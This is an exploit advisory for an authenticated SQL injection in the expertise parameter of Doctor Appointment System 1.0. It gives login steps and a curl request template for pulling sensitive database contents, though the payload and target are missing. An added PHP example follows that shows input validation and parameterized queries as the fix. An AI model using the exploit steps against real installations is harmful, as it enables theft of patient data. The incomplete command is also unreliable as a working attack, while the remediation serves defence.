Doctor Appointment System 1.0 SQL Injection

Doctor Appointment System version 1.0 suffers from a remote SQL injection vulnerability.


# Exploit Title: Doctor Appointment System 1.0 - Authenticated SQL Injection
# Date: 2021-02-09
# Exploit Author: Soham Bakore, Nakul Ratti
# Vendor Homepage:
# Software Link:
# Version: V1.0

Vulnerable File:

Vulnerable Issue:
The Expertise parameter has no input validation.

1] Login as a normal patient user
2] Insert cookie after successful login in the below command:
curl -i -s -o tmp -k -X $'POST' \
-H $'Host:' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 288' \
-H $'Connection: close' -H $'Cookie: PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
-H $'Upgrade-Insecure-Requests: 1' \
-b $'PHPSESSID=b85jccq5ns65d75g69j2uj37hf' \
3] Check the tmp file for sensitive information from the database.

Kindly let us know if any other information is required.
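
The missing control named above, input validation on the expertise parameter, is shown here together with a bound query parameter. This is an added example, not code from the application or from the advisory authors. The `doctors` table, its columns, the validation pattern and both function names are assumptions; it needs PHP 8 with pdo_sqlite.

```php
<?php
// Added example: hypothetical schema and handler, not the application's own code.
declare(strict_types=1);

/**
 * Validate the posted "expertise" value before it reaches the database.
 * The pattern is an assumption: letters, spaces and hyphens, 1 to 50 characters.
 */
function validateExpertise(mixed $raw): ?string
{
    if (!is_string($raw)) {
        return null; // rejects array input such as expertise[]=x
    }
    $value = trim($raw);
    return preg_match('/^[A-Za-z][A-Za-z \-]{0,49}$/D', $value) === 1 ? $value : null;
}

/** Look up doctors with a bound parameter; the value is never parsed as SQL. */
function findDoctorsByExpertise(PDO $db, string $expertise): array
{
    $stmt = $db->prepare('SELECT name, expertise FROM doctors WHERE expertise = :expertise');
    $stmt->execute([':expertise' => $expertise]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed in-memory data so the example runs offline.
// With MySQL, also set PDO::ATTR_EMULATE_PREPARES to false for server-side binding.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE doctors (name TEXT, expertise TEXT)');
$db->exec("INSERT INTO doctors VALUES ('Dr. A', 'Cardiology'), ('Dr. B', 'Dermatology')");

// Constructed inputs: an expected value and one containing a quote character.
foreach (['Cardiology', "Cardiology'"] as $input) {
    $expertise = validateExpertise($input);
    if ($expertise === null) {
        echo "rejected: input failed validation\n";
        continue;
    }
    echo count(findDoctorsByExpertise($db, $expertise)) . " row(s) for {$expertise}\n";
}

// Second layer: even if validation were skipped, the bound value is compared
// as a literal string, so the quote causes no syntax change and matches nothing.
echo count(findDoctorsByExpertise($db, "Cardiology'")) . " row(s) for unvalidated input\n";
```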
